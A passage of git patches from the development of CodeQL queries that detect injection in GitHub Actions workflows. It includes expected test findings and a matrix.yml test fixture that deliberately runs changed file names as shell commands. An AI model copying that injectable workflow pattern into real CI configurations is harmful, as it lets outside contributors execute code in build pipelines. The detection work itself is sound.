${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +subpaths +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | From 447b65e7a96b6dd4d3fe41c76d8d8f8d95564d1b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 12:37:41 +0100 Subject: [PATCH 0077/1267] Add script to build full DBs (testproj ones remove source code origin) --- build-test-dbs.sh | 5 +++++ 1 file changed, 5 insertions(+) create mode 100755 build-test-dbs.sh diff --git a/build-test-dbs.sh b/build-test-dbs.sh new file mode 100755 index 00000000000..d8fc4359b92 --- /dev/null +++ b/build-test-dbs.sh @@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf src-test.testproj || true +rm -rf lib-test.testproj || true +codeql database create src-test.testproj -l yaml -s ql/src/test +codeql database create lib-test.testproj -l yaml -s ql/lib/test From 8a9ec88b36422ab7f40bedd3abb5a07492beee54 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 13:21:29 +0100 Subject: [PATCH 0078/1267] feat(matrix): Add support for flow through matrix vars --- ql/lib/codeql/actions/Ast.qll | 78 +++++++++++++++++-- .../actions/controlflow/internal/Cfg.qll | 22 +++++- .../dataflow/internal/DataFlowPrivate.qll | 15 +++- ql/src/{test => Debug}/partial.ql | 2 +- ql/src/test/.github/workflows/matrix.yml | 42 ++++++++++ ql/src/test/partial.expected | 28 ------- ql/src/test/test.expected | 10 +++ 7 files changed, 159 insertions(+), 38 deletions(-) rename ql/src/{test => Debug}/partial.ql (92%) create mode 100644 ql/src/test/.github/workflows/matrix.yml delete mode 100644 ql/src/test/partial.expected diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2a506f2100c..c2b1cda8277 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -81,6 +81,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -125,6 +127,23 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } +class StrategyStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + StrategyStmt() { parent.lookup("strategy") = this } + + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + MatrixVariableExpr getMatrixVariableExpr(string name) { + this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + } + + string getAMatrixVariableName() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) + } +} + class InputExpr extends Expression instanceof YamlString { InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } } @@ -138,6 +157,14 @@ class OutputExpr extends Expression instanceof YamlString { } } +class MatrixVariableExpr extends Expression instanceof YamlString { + MatrixVariableExpr() { + exists(StrategyStmt outputs | + outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this + ) + } +} + /** * A Job is a collection of steps that run in an execution environment. */ @@ -191,6 +218,8 @@ class JobStmt extends Statement instanceof Actions::Job { IfStmt getIfStmt() { result = super.getIf() } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } /** @@ -332,7 +361,8 @@ class ExprAccessExpr extends Expression instanceof YamlString { class CtxAccessExpr extends ExprAccessExpr { CtxAccessExpr() { expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() ]) } @@ -342,22 +372,28 @@ class CtxAccessExpr extends ExprAccessExpr { } private string stepsCtxRegex() { - result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or - result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] } /** @@ -487,3 +523,31 @@ class EnvCtxAccessExpr extends CtxAccessExpr { ) } } + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ matrix.foo }}` + */ +class MatrixCtxAccessExpr extends CtxAccessExpr { + string fieldName; + + MatrixCtxAccessExpr() { + expr.regexpMatch(matrixCtxRegex()) and + fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override Expression getRefExpr() { + exists(WorkflowStmt w | + w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + w.getAChildNode*() = this + ) + or + exists(JobStmt j | + j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + j.getAChildNode*() = this + ) + } +} diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 94a2c6a71e2..b8137172b8c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -174,6 +174,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ( child = this.(ReusableWorkflowStmt).getInputsStmt() or child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getStrategyStmt() or child = this.(ReusableWorkflowStmt).getAJobStmt() ) and l = child.getLocation() @@ -185,7 +186,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt else result = rank[i](Expression child, Location l | - child = super.getAJobStmt() and + ( + child = super.getAJobStmt() or + child = super.getStrategyStmt() + ) and l = child.getLocation() | child @@ -225,6 +229,21 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getMatrixVariableExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = @@ -232,6 +251,7 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { ( child = super.getAStepStmt() or child = super.getOutputsStmt() or + child = super.getStrategyStmt() or child = super.getUsesExpr() ) and l = child.getLocation() diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 43239e29485..b9aafb8ec94 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -133,7 +133,7 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { - // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env or inputs + // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs name = any(StepsCtxAccessExpr a).getFieldName() or name = any(NeedsCtxAccessExpr a).getFieldName() or name = any(JobsCtxAccessExpr a).getFieldName() @@ -209,6 +209,18 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{}} expression accesing a matrix variable and the matrix itself + * e.g. ${{ matrix.foo }} + */ +predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(Expression astFrom, MatrixCtxAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an env var and the var definition itself * e.g. ${{ env.foo }} @@ -234,6 +246,7 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or + matrixCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/src/test/partial.ql b/ql/src/Debug/partial.ql similarity index 92% rename from ql/src/test/partial.ql rename to ql/src/Debug/partial.ql index 779749f82f6..c0a694455dc 100644 --- a/ql/src/test/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + source.getLocation().getFile().getBaseName() = "matrix.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/src/test/.github/workflows/matrix.yml new file mode 100644 index 00000000000..30672ecaaa7 --- /dev/null +++ b/ql/src/test/.github/workflows/matrix.yml @@ -0,0 +1,42 @@ +name: "CodeQL Auto Language" + +on: + push: + branches: [ main ] + pull_request: + branches: [ main ] + schedule: + - cron: '17 19 * * 6' + +jobs: + create-matrix: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.all_changed_files }} + steps: + - name: Get changed files + id: set-matrix + uses: tj-actions/changed-files@v40 + + analyze: + needs: create-matrix + if: ${{ needs.create-matrix.outputs.matrix != '[]' }} + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ${{ fromJSON(needs.create-matrix.outputs.matrix) }} + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + # Initializes the CodeQL tools for scanning. + - run: | + ${{ matrix.language }} diff --git a/ql/src/test/partial.expected b/ql/src/test/partial.expected deleted file mode 100644 index 98aea83de2e..00000000000 --- a/ql/src/test/partial.expected +++ /dev/null @@ -1,28 +0,0 @@ -edges -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | -| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | -| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | -| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | -#select -| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | this source | -| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | this source | -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/calling_workflow.yml:14:20:14:60 | 